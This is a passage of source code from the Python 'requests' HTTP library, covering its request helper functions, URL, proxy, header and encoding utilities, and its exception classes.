fileobj, 'content_type')`` or a 4-tuple ``('filename', fileobj, 'content_type', custom_headers)``, where ``'content_type'`` is a string defining the content type of the given file and ``custom_headers`` a dict-like object containing additional headers to add for the file. :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How many seconds to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param allow_redirects: (optional) Boolean. Enable/disable GET/OPTIONS/POST/PUT/PATCH/DELETE/HEAD redirection. Defaults to ``True``. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. Defaults to ``True``. :param stream: (optional) if ``False``, the response content will be immediately downloaded. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. 
:return: :class:`Response <Response>` object :rtype: requests.Response Usage:: >>> import requests >>> req = requests.request('GET', 'https://httpbin.org/get') >>> req <Response [200]> """ # By using the 'with' statement we are sure the session is closed, thus we # avoid leaving sockets open which can trigger a ResourceWarning in some # cases, and look like a memory leak in others. with sessions.Session() as session: return session.request(method=method, url=url, **kwargs) def get(url, params=None, **kwargs): r"""Sends a GET request. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary, list of tuples or bytes to send in the query string for the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("get", url, params=params, **kwargs) def options(url, **kwargs): r"""Sends an OPTIONS request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("options", url, **kwargs) def head(url, **kwargs): r"""Sends a HEAD request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. If `allow_redirects` is not provided, it will be set to `False` (as opposed to the default :meth:`request` behavior). :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault("allow_redirects", False) return request("head", url, **kwargs) def post(url, data=None, json=None, **kwargs): r"""Sends a POST request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("post", url, data=data, json=json, **kwargs) def put(url, data=None, **kwargs): r"""Sends a PUT request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("put", url, data=data, **kwargs) def patch(url, data=None, **kwargs): r"""Sends a PATCH request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request("patch", url, data=data, **kwargs) def delete(url, **kwargs): r"""Sends a DELETE request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. 
:return: :class:`Response <Response>` object :rtype: requests.Response """ return request("delete", url, **kwargs) File: src/requests/_internal_utils.py """ requests._internal_utils ~~~~~~~~~~~~~~ Provides utility functions that are consumed internally by Requests which depend on extremely few external helpers (such as compat) """ import re from .compat import builtin_str _VALID_HEADER_NAME_RE_BYTE = re.compile(rb"^[^:\s][^:\r\n]*$") _VALID_HEADER_NAME_RE_STR = re.compile(r"^[^:\s][^:\r\n]*$") _VALID_HEADER_VALUE_RE_BYTE = re.compile(rb"^\S[^\r\n]*$|^$") _VALID_HEADER_VALUE_RE_STR = re.compile(r"^\S[^\r\n]*$|^$") _HEADER_VALIDATORS_STR = (_VALID_HEADER_NAME_RE_STR, _VALID_HEADER_VALUE_RE_STR) _HEADER_VALIDATORS_BYTE = (_VALID_HEADER_NAME_RE_BYTE, _VALID_HEADER_VALUE_RE_BYTE) HEADER_VALIDATORS = { bytes: _HEADER_VALIDATORS_BYTE, str: _HEADER_VALIDATORS_STR, } def to_native_string(string, encoding="ascii"): """Given a string object, regardless of type, returns a representation of that string in the native string type, encoding and decoding where necessary. This assumes ASCII unless told otherwise. """ if isinstance(string, builtin_str): out = string else: out = string.decode(encoding) return out def unicode_is_ascii(u_string): """Determine if unicode string only contains ASCII characters. :param str u_string: unicode string to check. Must be unicode and not Python 2 `str`. :rtype: bool """ assert isinstance(u_string, str) try: u_string.encode("ascii") return True except UnicodeEncodeError: return False File: src/requests/utils.py """ requests.utils ~~~~~~~~~~~~~~ This module provides utility functions that are used within Requests that are also useful for external consumption. """ import codecs import contextlib import io import os import re import socket import struct import sys import tempfile import warnings import zipfile from collections import OrderedDict from urllib3.util import make_headers, parse_url from . import certs from .__version__ import __version__ # to_native_string is unused here, but imported here for backwards compatibility from ._internal_utils import ( # noqa: F401 _HEADER_VALIDATORS_BYTE, _HEADER_VALIDATORS_STR, HEADER_VALIDATORS, to_native_string, ) from .compat import ( Mapping, basestring, bytes, getproxies, getproxies_environment, integer_types, is_urllib3_1, ) from .compat import parse_http_list as _parse_list_header from .compat import ( proxy_bypass, proxy_bypass_environment, quote, str, unquote, urlparse, urlunparse, ) from .cookies import cookiejar_from_dict from .exceptions import ( FileModeWarning, InvalidHeader, InvalidURL, UnrewindableBodyError, ) from .structures import CaseInsensitiveDict NETRC_FILES = (".netrc", "_netrc") DEFAULT_CA_BUNDLE_PATH = certs.where() DEFAULT_PORTS = {"http": 80, "https": 443} # Ensure that ', ' is used to preserve previous delimiter behavior. 
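# urllib3's make_headers() may join the encodings with a bare comma (e.g.
# "gzip,deflate"), so the value is re-split and re-joined with ", " here.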
DEFAULT_ACCEPT_ENCODING = ", ".join( re.split(r",\s*", make_headers(accept_encoding=True)["accept-encoding"]) ) if sys.platform == "win32": # provide a proxy_bypass version on Windows without DNS lookups def proxy_bypass_registry(host): try: import winreg except ImportError: return False try: internetSettings = winreg.OpenKey( winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Internet Settings", ) # ProxyEnable could be REG_SZ or REG_DWORD, normalizing it proxyEnable = int(winreg.QueryValueEx(internetSettings, "ProxyEnable")[0]) # ProxyOverride is almost always a string proxyOverride = winreg.QueryValueEx(internetSettings, "ProxyOverride")[0] except (OSError, ValueError): return False if not proxyEnable or not proxyOverride: return False # make a check value list from the registry entry: replace the # '<local>' string by the localhost entry and the corresponding # canonical entry. proxyOverride = proxyOverride.split(";") # filter out empty strings to avoid re.match return true in the following code. proxyOverride = filter(None, proxyOverride) # now check if we match one of the registry values. for test in proxyOverride: if test == "<local>": if "." not in host: return True test = test.replace(".", r"\.") # mask dots test = test.replace("*", r".*") # change glob sequence test = test.replace("?", r".") # change glob char if re.match(test, host, re.I): return True return False def proxy_bypass(host): # noqa """Return True, if the host should be bypassed. Checks proxy settings gathered from the environment, if specified, or the registry. """ if getproxies_environment(): return proxy_bypass_environment(host) else: return proxy_bypass_registry(host) def dict_to_sequence(d): """Returns an internal sequence dictionary update.""" if hasattr(d, "items"): d = d.items() return d def super_len(o): total_length = None current_position = 0 if not is_urllib3_1 and isinstance(o, str): # urllib3 2.x+ treats all strings as utf-8 instead # of latin-1 (iso-8859-1) like http.client. o = o.encode("utf-8") if hasattr(o, "__len__"): total_length = len(o) elif hasattr(o, "len"): total_length = o.len elif hasattr(o, "fileno"): try: fileno = o.fileno() except (io.UnsupportedOperation, AttributeError): # AttributeError is a surprising exception, seeing as how we've just checked # that `hasattr(o, 'fileno')`. It happens for objects obtained via # `Tarfile.extractfile()`, per issue 5229. pass else: total_length = os.fstat(fileno).st_size # Having used fstat to determine the file length, we need to # confirm that this file was opened up in binary mode. if "b" not in o.mode: warnings.warn( ( "Requests has determined the content-length for this " "request using the binary size of the file: however, the " "file has been opened in text mode (i.e. without the 'b' " "flag in the mode). This may lead to an incorrect " "content-length. In Requests 3.0, support will be removed " "for files in text mode." ), FileModeWarning, ) if hasattr(o, "tell"): try: current_position = o.tell() except OSError: # This can happen in some weird situations, such as when the file # is actually a special file descriptor like stdin. In this # instance, we don't know what the length is, so set it to zero and # let requests chunk it instead. 
if total_length is not None: current_position = total_length else: if hasattr(o, "seek") and total_length is None: # StringIO and BytesIO have seek but no usable fileno try: # seek to end of file o.seek(0, 2) total_length = o.tell() # seek back to current position to support # partially read file-like objects o.seek(current_position or 0) except OSError: total_length = 0 if total_length is None: total_length = 0 return max(0, total_length - current_position) def get_netrc_auth(url, raise_errors=False): """Returns the Requests tuple auth for a given url from netrc.""" netrc_file = os.environ.get("NETRC") if netrc_file is not None: netrc_locations = (netrc_file,) else: netrc_locations = (f"~/{f}" for f in NETRC_FILES) try: from netrc import NetrcParseError, netrc netrc_path = None for f in netrc_locations: try: loc = os.path.expanduser(f) except KeyError: # os.path.expanduser can fail when $HOME is undefined and # getpwuid fails. See https://bugs.python.org/issue20164 & # https://github.com/psf/requests/issues/1846 return if os.path.exists(loc): netrc_path = loc break # Abort early if there isn't one. if netrc_path is None: return ri = urlparse(url) # Strip port numbers from netloc. This weird `if...encode`` dance is # used for Python 3.2, which doesn't support unicode literals. splitstr = b":" if isinstance(url, str): splitstr = splitstr.decode("ascii") host = ri.netloc.split(splitstr)[0] try: _netrc = netrc(netrc_path).authenticators(host) if _netrc: # Return with login / password login_i = 0 if _netrc[0] else 1 return (_netrc[login_i], _netrc[2]) except (NetrcParseError, OSError): # If there was a parsing error or a permissions issue reading the file, # we'll just skip netrc auth unless explicitly asked to raise errors. if raise_errors: raise # App Engine hackiness. except (ImportError, AttributeError): pass def guess_filename(obj): """Tries to guess the filename of the given object.""" name = getattr(obj, "name", None) if name and isinstance(name, basestring) and name[0] != "<" and name[-1] != ">": return os.path.basename(name) def extract_zipped_paths(path): """Replace nonexistent paths that look like they refer to a member of a zip archive with the location of an extracted copy of the target, or else just return the provided path unchanged. 
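
    For example (illustrative paths only): given ``/certs/bundle.zip/ca.pem``
    where ``/certs/bundle.zip`` exists on disk but the full path does not, the
    member ``ca.pem`` is extracted into the temporary directory and that
    extracted location is returned.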
""" if os.path.exists(path): # this is already a valid path, no need to do anything further return path # find the first valid part of the provided path and treat that as a zip archive # assume the rest of the path is the name of a member in the archive archive, member = os.path.split(path) while archive and not os.path.exists(archive): archive, prefix = os.path.split(archive) if not prefix: # If we don't check for an empty prefix after the split (in other words, archive remains unchanged after the split), # we _can_ end up in an infinite loop on a rare corner case affecting a small number of users break member = "/".join([prefix, member]) if not zipfile.is_zipfile(archive): return path zip_file = zipfile.ZipFile(archive) if member not in zip_file.namelist(): return path # we have a valid zip archive and a valid member of that archive tmp = tempfile.gettempdir() extracted_path = os.path.join(tmp, member.split("/")[-1]) if not os.path.exists(extracted_path): # use read + write to avoid the creating nested folders, we only want the file, avoids mkdir racing condition with atomic_open(extracted_path) as file_handler: file_handler.write(zip_file.read(member)) return extracted_path @contextlib.contextmanager def atomic_open(filename): """Write a file to the disk in an atomic fashion""" tmp_descriptor, tmp_name = tempfile.mkstemp(dir=os.path.dirname(filename)) try: with os.fdopen(tmp_descriptor, "wb") as tmp_handler: yield tmp_handler os.replace(tmp_name, filename) except BaseException: os.remove(tmp_name) raise def from_key_val_list(value): """Take an object and test to see if it can be represented as a dictionary. Unless it can not be represented as such, return an OrderedDict, e.g., :: >>> from_key_val_list([('key', 'val')]) OrderedDict([('key', 'val')]) >>> from_key_val_list('string') Traceback (most recent call last): ... ValueError: cannot encode objects that are not 2-tuples >>> from_key_val_list({'key': 'val'}) OrderedDict([('key', 'val')]) :rtype: OrderedDict """ if value is None: return None if isinstance(value, (str, bytes, bool, int)): raise ValueError("cannot encode objects that are not 2-tuples") return OrderedDict(value) def to_key_val_list(value): """Take an object and test to see if it can be represented as a dictionary. If it can be, return a list of tuples, e.g., :: >>> to_key_val_list([('key', 'val')]) [('key', 'val')] >>> to_key_val_list({'key': 'val'}) [('key', 'val')] >>> to_key_val_list('string') Traceback (most recent call last): ... ValueError: cannot encode objects that are not 2-tuples :rtype: list """ if value is None: return None if isinstance(value, (str, bytes, bool, int)): raise ValueError("cannot encode objects that are not 2-tuples") if isinstance(value, Mapping): value = value.items() return list(value) # From mitsuhiko/werkzeug (used with permission). def parse_list_header(value): """Parse lists as described by RFC 2068 Section 2. In particular, parse comma-separated lists where the elements of the list may include quoted-strings. A quoted-string could contain a comma. A non-quoted string could have quotes in the middle. Quotes are removed automatically after parsing. It basically works like :func:`parse_set_header` just that items may appear multiple times and case sensitivity is preserved. The return value is a standard :class:`list`: >>> parse_list_header('token, "quoted value"') ['token', 'quoted value'] To create a header from the :class:`list` again, use the :func:`dump_header` function. :param value: a string with a list header. 
:return: :class:`list` :rtype: list """ result = [] for item in _parse_list_header(value): if item[:1] == item[-1:] == '"': item = unquote_header_value(item[1:-1]) result.append(item) return result # From mitsuhiko/werkzeug (used with permission). def parse_dict_header(value): """Parse lists of key, value pairs as described by RFC 2068 Section 2 and convert them into a python dict: >>> d = parse_dict_header('foo="is a fish", bar="as well"') >>> type(d) is dict True >>> sorted(d.items()) [('bar', 'as well'), ('foo', 'is a fish')] If there is no value for a key it will be `None`: >>> parse_dict_header('key_without_value') {'key_without_value': None} To create a header from the :class:`dict` again, use the :func:`dump_header` function. :param value: a string with a dict header. :return: :class:`dict` :rtype: dict """ result = {} for item in _parse_list_header(value): if "=" not in item: result[item] = None continue name, value = item.split("=", 1) if value[:1] == value[-1:] == '"': value = unquote_header_value(value[1:-1]) result[name] = value return result # From mitsuhiko/werkzeug (used with permission). def unquote_header_value(value, is_filename=False): r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. :rtype: str """ if value and value[0] == value[-1] == '"': # this is not the real unquoting, but fixing this so that the # RFC is met will result in bugs with internet explorer and # probably some other browsers as well. IE for example is # uploading files with "C:\foo\bar.txt" as filename value = value[1:-1] # if this is a filename and the starting characters look like # a UNC path, then just return the value without quotes. Using the # replace sequence below on a UNC path has the effect of turning # the leading double slash into a single slash and then # _fix_ie_filename() doesn't work correctly. See #458. if not is_filename or value[:2] != "\\\\": return value.replace("\\\\", "\\").replace('\\"', '"') return value def dict_from_cookiejar(cj): """Returns a key/value dictionary from a CookieJar. :param cj: CookieJar object to extract cookies from. :rtype: dict """ cookie_dict = {cookie.name: cookie.value for cookie in cj} return cookie_dict def add_dict_to_cookiejar(cj, cookie_dict): """Returns a CookieJar from a key/value dictionary. :param cj: CookieJar to insert cookies into. :param cookie_dict: Dict of key/values to insert into CookieJar. :rtype: CookieJar """ return cookiejar_from_dict(cookie_dict, cj) def get_encodings_from_content(content): """Returns encodings from given content string. :param content: bytestring to extract encodings from. """ warnings.warn( ( "In requests 3.0, get_encodings_from_content will be removed. For " "more information, please see the discussion on issue #2266. 
(This" " warning should only appear once.)" ), DeprecationWarning, ) charset_re = re.compile(r'<meta.*?charset=["\']*(.+?)["\'>]', flags=re.I) pragma_re = re.compile(r'<meta.*?content=["\']*;?charset=(.+?)["\'>]', flags=re.I) xml_re = re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]') return ( charset_re.findall(content) + pragma_re.findall(content) + xml_re.findall(content) ) def _parse_content_type_header(header): """Returns content type and parameters from given header :param header: string :return: tuple containing content type and dictionary of parameters """ tokens = header.split(";") content_type, params = tokens[0].strip(), tokens[1:] params_dict = {} items_to_strip = "\"' " for param in params: param = param.strip() if param: key, value = param, True index_of_equals = param.find("=") if index_of_equals != -1: key = param[:index_of_equals].strip(items_to_strip) value = param[index_of_equals + 1 :].strip(items_to_strip) params_dict[key.lower()] = value return content_type, params_dict def get_encoding_from_headers(headers): """Returns encodings from given HTTP Header Dict. :param headers: dictionary to extract encoding from. :rtype: str """ content_type = headers.get("content-type") if not content_type: return None content_type, params = _parse_content_type_header(content_type) if "charset" in params: return params["charset"].strip("'\"") if "text" in content_type: return "ISO-8859-1" if "application/json" in content_type: # Assume UTF-8 based on RFC 4627: https://www.ietf.org/rfc/rfc4627.txt since the charset was unset return "utf-8" def stream_decode_response_unicode(iterator, r): """Stream decodes an iterator.""" if r.encoding is None: yield from iterator return decoder = codecs.getincrementaldecoder(r.encoding)(errors="replace") for chunk in iterator: rv = decoder.decode(chunk) if rv: yield rv rv = decoder.decode(b"", final=True) if rv: yield rv def iter_slices(string, slice_length): """Iterate over slices of a string.""" pos = 0 if slice_length is None or slice_length <= 0: slice_length = len(string) while pos < len(string): yield string[pos : pos + slice_length] pos += slice_length def get_unicode_from_response(r): """Returns the requested content back in unicode. :param r: Response object to get unicode content from. Tried: 1. charset from content-type 2. fall back and replace all unicode characters :rtype: str """ warnings.warn( ( "In requests 3.0, get_unicode_from_response will be removed. For " "more information, please see the discussion on issue #2266. (This" " warning should only appear once.)" ), DeprecationWarning, ) tried_encodings = [] # Try charset from content-type encoding = get_encoding_from_headers(r.headers) if encoding: try: return str(r.content, encoding) except UnicodeError: tried_encodings.append(encoding) # Fall back: try: return str(r.content, encoding, errors="replace") except TypeError: return r.content # The unreserved URI characters (RFC 3986) UNRESERVED_SET = frozenset( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~" ) def unquote_unreserved(uri): """Un-escape any percent-escape sequences in a URI that are unreserved characters. This leaves all reserved, illegal and non-ASCII bytes encoded. 
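
    For example, ``%7E`` (the unreserved ``~``) is decoded while the reserved
    ``%2F`` is left alone, so ``"a%7Eb%2Fc"`` becomes ``"a~b%2Fc"``.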
:rtype: str """ parts = uri.split("%") for i in range(1, len(parts)): h = parts[i][0:2] if len(h) == 2 and h.isalnum(): try: c = chr(int(h, 16)) except ValueError: raise InvalidURL(f"Invalid percent-escape sequence: '{h}'") if c in UNRESERVED_SET: parts[i] = c + parts[i][2:] else: parts[i] = f"%{parts[i]}" else: parts[i] = f"%{parts[i]}" return "".join(parts) def requote_uri(uri): """Re-quote the given URI. This function passes the given URI through an unquote/quote cycle to ensure that it is fully and consistently quoted. :rtype: str """ safe_with_percent = "!#$%&'()*+,/:;=?@[]~" safe_without_percent = "!#$&'()*+,/:;=?@[]~" try: # Unquote only the unreserved characters # Then quote only illegal characters (do not quote reserved, # unreserved, or '%') return quote(unquote_unreserved(uri), safe=safe_with_percent) except InvalidURL: # We couldn't unquote the given URI, so let's try quoting it, but # there may be unquoted '%'s in the URI. We need to make sure they're # properly quoted so they do not cause issues elsewhere. return quote(uri, safe=safe_without_percent) def address_in_network(ip, net): """This function allows you to check if an IP belongs to a network subnet Example: returns True if ip = 192.168.1.1 and net = 192.168.1.0/24 returns False if ip = 192.168.1.1 and net = 192.168.100.0/24 :rtype: bool """ ipaddr = struct.unpack("=L", socket.inet_aton(ip))[0] netaddr, bits = net.split("/") netmask = struct.unpack("=L", socket.inet_aton(dotted_netmask(int(bits))))[0] network = struct.unpack("=L", socket.inet_aton(netaddr))[0] & netmask return (ipaddr & netmask) == (network & netmask) def dotted_netmask(mask): """Converts mask from /xx format to xxx.xxx.xxx.xxx Example: if mask is 24 function returns 255.255.255.0 :rtype: str """ bits = 0xFFFFFFFF ^ (1 << 32 - mask) - 1 return socket.inet_ntoa(struct.pack(">I", bits)) def is_ipv4_address(string_ip): """ :rtype: bool """ try: socket.inet_aton(string_ip) except OSError: return False return True def is_valid_cidr(string_network): """ Very simple check of the cidr format in no_proxy variable. :rtype: bool """ if string_network.count("/") == 1: try: mask = int(string_network.split("/")[1]) except ValueError: return False if mask < 1 or mask > 32: return False try: socket.inet_aton(string_network.split("/")[0]) except OSError: return False else: return False return True @contextlib.contextmanager def set_environ(env_name, value): """Set the environment variable 'env_name' to 'value' Save previous value, yield, and then restore the previous value stored in the environment variable 'env_name'. If 'value' is None, do nothing""" value_changed = value is not None if value_changed: old_value = os.environ.get(env_name) os.environ[env_name] = value try: yield finally: if value_changed: if old_value is None: del os.environ[env_name] else: os.environ[env_name] = old_value def should_bypass_proxies(url, no_proxy): """ Returns whether we should bypass proxies or not. :rtype: bool """ # Prioritize lowercase environment variables over uppercase # to keep a consistent behaviour with other http projects (curl, wget). def get_proxy(key): return os.environ.get(key) or os.environ.get(key.upper()) # First check whether no_proxy is defined. If it is, check that the URL # we're getting isn't in the no_proxy list. no_proxy_arg = no_proxy if no_proxy is None: no_proxy = get_proxy("no_proxy") parsed = urlparse(url) if parsed.hostname is None: # URLs don't always have hostnames, e.g. file:/// urls. return True if no_proxy: # We need to check whether we match here. 
We need to see if we match # the end of the hostname, both with and without the port. no_proxy = (host for host in no_proxy.replace(" ", "").split(",") if host) if is_ipv4_address(parsed.hostname): for proxy_ip in no_proxy: if is_valid_cidr(proxy_ip): if address_in_network(parsed.hostname, proxy_ip): return True elif parsed.hostname == proxy_ip: # If no_proxy ip was defined in plain IP notation instead of cidr notation & # matches the IP of the index return True else: host_with_port = parsed.hostname if parsed.port: host_with_port += f":{parsed.port}" for host in no_proxy: if parsed.hostname.endswith(host) or host_with_port.endswith(host): # The URL does match something in no_proxy, so we don't want # to apply the proxies on this URL. return True with set_environ("no_proxy", no_proxy_arg): # parsed.hostname can be `None` in cases such as a file URI. try: bypass = proxy_bypass(parsed.hostname) except (TypeError, socket.gaierror): bypass = False if bypass: return True return False def get_environ_proxies(url, no_proxy=None): """ Return a dict of environment proxies. :rtype: dict """ if should_bypass_proxies(url, no_proxy=no_proxy): return {} else: return getproxies() def select_proxy(url, proxies): """Select a proxy for the url, if applicable. :param url: The url being for the request :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs """ proxies = proxies or {} urlparts = urlparse(url) if urlparts.hostname is None: return proxies.get(urlparts.scheme, proxies.get("all")) proxy_keys = [ urlparts.scheme + "://" + urlparts.hostname, urlparts.scheme, "all://" + urlparts.hostname, "all", ] proxy = None for proxy_key in proxy_keys: if proxy_key in proxies: proxy = proxies[proxy_key] break return proxy def resolve_proxies(request, proxies, trust_env=True): """This method takes proxy information from a request and configuration input to resolve a mapping of target proxies. This will consider settings such as NO_PROXY to strip proxy configurations. :param request: Request or PreparedRequest :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs :param trust_env: Boolean declaring whether to trust environment configs :rtype: dict """ proxies = proxies if proxies is not None else {} url = request.url scheme = urlparse(url).scheme no_proxy = proxies.get("no_proxy") new_proxies = proxies.copy() if trust_env and not should_bypass_proxies(url, no_proxy=no_proxy): environ_proxies = get_environ_proxies(url, no_proxy=no_proxy) proxy = environ_proxies.get(scheme, environ_proxies.get("all")) if proxy: new_proxies.setdefault(scheme, proxy) return new_proxies def default_user_agent(name="python-requests"): """ Return a string representing the default user agent. :rtype: str """ return f"{name}/{__version__}" def default_headers(): """ :rtype: requests.structures.CaseInsensitiveDict """ return CaseInsensitiveDict( { "User-Agent": default_user_agent(), "Accept-Encoding": DEFAULT_ACCEPT_ENCODING, "Accept": "*/*", "Connection": "keep-alive", } ) def parse_header_links(value): """Return a list of parsed link headers proxies. i.e. 
Link: <http:/.../front.jpeg>; rel=front; type="image/jpeg",<http://.../back.jpeg>; rel=back;type="image/jpeg" :rtype: list """ links = [] replace_chars = " '\"" value = value.strip(replace_chars) if not value: return links for val in re.split(", *<", value): try: url, params = val.split(";", 1) except ValueError: url, params = val, "" link = {"url": url.strip("<> '\"")} for param in params.split(";"): try: key, value = param.split("=") except ValueError: break link[key.strip(replace_chars)] = value.strip(replace_chars) links.append(link) return links # Null bytes; no need to recreate these on each call to guess_json_utf _null = "\x00".encode("ascii") # encoding to ASCII for Python 3 _null2 = _null * 2 _null3 = _null * 3 def guess_json_utf(data): """ :rtype: str """ # JSON always starts with two ASCII characters, so detection is as # easy as counting the nulls and from their location and count # determine the encoding. Also detect a BOM, if present. sample = data[:4] if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE): return "utf-32" # BOM included if sample[:3] == codecs.BOM_UTF8: return "utf-8-sig" # BOM included, MS style (discouraged) if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE): return "utf-16" # BOM included nullcount = sample.count(_null) if nullcount == 0: return "utf-8" if nullcount == 2: if sample[::2] == _null2: # 1st and 3rd are null return "utf-16-be" if sample[1::2] == _null2: # 2nd and 4th are null return "utf-16-le" # Did not detect 2 valid UTF-16 ascii-range characters if nullcount == 3: if sample[:3] == _null3: return "utf-32-be" if sample[1:] == _null3: return "utf-32-le" # Did not detect a valid UTF-32 ascii-range character return None def prepend_scheme_if_needed(url, new_scheme): """Given a URL that may or may not have a scheme, prepend the given scheme. Does not replace a present scheme with the one provided as an argument. :rtype: str """ parsed = parse_url(url) scheme, auth, host, port, path, query, fragment = parsed # A defect in urlparse determines that there isn't a netloc present in some # urls. We previously assumed parsing was overly cautious, and swapped the # netloc and path. Due to a lack of tests on the original defect, this is # maintained with parse_url for backwards compatibility. netloc = parsed.netloc if not netloc: netloc, path = path, netloc if auth: # parse_url doesn't provide the netloc with auth # so we'll add it ourselves. netloc = "@".join([auth, netloc]) if scheme is None: scheme = new_scheme if path is None: path = "" return urlunparse((scheme, netloc, path, "", query, fragment)) def get_auth_from_url(url): """Given a url with authentication components, extract them into a tuple of username,password. :rtype: (str,str) """ parsed = urlparse(url) try: auth = (unquote(parsed.username), unquote(parsed.password)) except (AttributeError, TypeError): auth = ("", "") return auth def check_header_validity(header): """Verifies that header parts don't contain leading whitespace reserved characters, or return characters. :param header: tuple, in the format (name, value). 
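    :raises InvalidHeader: if either part is not ``str``/``bytes`` or fails
        validation (see ``_validate_header_part`` below).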
""" name, value = header _validate_header_part(header, name, 0) _validate_header_part(header, value, 1) def _validate_header_part(header, header_part, header_validator_index): if isinstance(header_part, str): validator = _HEADER_VALIDATORS_STR[header_validator_index] elif isinstance(header_part, bytes): validator = _HEADER_VALIDATORS_BYTE[header_validator_index] else: raise InvalidHeader( f"Header part ({header_part!r}) from {header} " f"must be of type str or bytes, not {type(header_part)}" ) if not validator.match(header_part): header_kind = "name" if header_validator_index == 0 else "value" raise InvalidHeader( f"Invalid leading whitespace, reserved character(s), or return " f"character(s) in header {header_kind}: {header_part!r}" ) def urldefragauth(url): """ Given a url remove the fragment and the authentication part. :rtype: str """ scheme, netloc, path, params, query, fragment = urlparse(url) # see func:`prepend_scheme_if_needed` if not netloc: netloc, path = path, netloc netloc = netloc.rsplit("@", 1)[-1] return urlunparse((scheme, netloc, path, params, query, "")) def rewind_body(prepared_request): """Move file pointer back to its recorded starting position so it can be read again on redirect. """ body_seek = getattr(prepared_request.body, "seek", None) if body_seek is not None and isinstance( prepared_request._body_position, integer_types ): try: body_seek(prepared_request._body_position) except OSError: raise UnrewindableBodyError( "An error occurred when rewinding request body for redirect." ) else: raise UnrewindableBodyError("Unable to rewind request body for redirect.") File: src/requests/exceptions.py """ requests.exceptions ~~~~~~~~~~~~~~~~~~~ This module contains the set of Requests' exceptions. """ from urllib3.exceptions import HTTPError as BaseHTTPError from .compat import JSONDecodeError as CompatJSONDecodeError class RequestException(IOError): """There was an ambiguous exception that occurred while handling your request. """ def __init__(self, *args, **kwargs): """Initialize RequestException with `request` and `response` objects.""" response = kwargs.pop("response", None) self.response = response self.request = kwargs.pop("request", None) if response is not None and not self.request and hasattr(response, "request"): self.request = self.response.request super().__init__(*args, **kwargs) class InvalidJSONError(RequestException): """A JSON error occurred.""" class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError): """Couldn't decode the text into json""" def __init__(self, *args, **kwargs): """ Construct the JSONDecodeError instance first with all args. Then use it's args to construct the IOError so that the json specific args aren't used as IOError specific args and the error message from JSONDecodeError is preserved. """ CompatJSONDecodeError.__init__(self, *args) InvalidJSONError.__init__(self, *self.args, **kwargs) def __reduce__(self): """ The __reduce__ method called when pickling the object must be the one from the JSONDecodeError (be it json/simplejson) as it expects all the arguments for instantiation, not just one like the IOError, and the MRO would by default call the __reduce__ method from the IOError due to the inheritance order. 
""" return CompatJSONDecodeError.__reduce__(self) class HTTPError(RequestException): """An HTTP error occurred.""" class ConnectionError(RequestException): """A Connection error occurred.""" class ProxyError(ConnectionError): """A proxy error occurred.""" class SSLError(ConnectionError): """An SSL error occurred.""" class Timeout(RequestException): """The request timed out. Catching this error will catch both :exc:`~requests.exceptions.ConnectTimeout` and :exc:`~requests.exceptions.ReadTimeout` errors. """ class ConnectTimeout(ConnectionError, Timeout): """The request timed out while trying to connect to the remote server. Requests that produced this error are safe to retry. """ class ReadTimeout(Timeout): """The server did not send any data in the allotted amount of time.""" class URLRequired(RequestException): """A valid URL is required to make a request.""" class TooManyRedirects(RequestException): """Too many redirects.""" class MissingSchema(RequestException, ValueError): """The URL scheme (e.g. http or https) is missing.""" class InvalidSchema(RequestException, ValueError): """The URL scheme provided is either invalid or unsupported.""" class InvalidURL(RequestException, ValueError): """The URL provided was somehow invalid.""" class InvalidHeader(RequestException, ValueError): """The header value provided was somehow invalid.""" class InvalidProxyURL(InvalidURL): """The proxy URL provided is invalid.""" class ChunkedEncodingError(RequestException): """The server declared chunked encoding but sent an invalid chunk.""" class ContentDecodingError(RequestException, BaseHTTPError): """Failed to decode response content.""" class StreamConsumedError(RequestException, TypeError): """The content for this response was already consumed.""" class RetryError(RequestException): """Custom retries logic failed""" class UnrewindableBodyError(RequestException): """Requests encountered an error when trying to rewind a body.""" # Warnings class RequestsWarning(Warning): """Base warning for Requests.""" class FileModeWarning(RequestsWarning, DeprecationWarning): """A file was opened in text mode, but Requests determined its binary length.""" class RequestsDependencyWarning(RequestsWarning): """An imported dependency 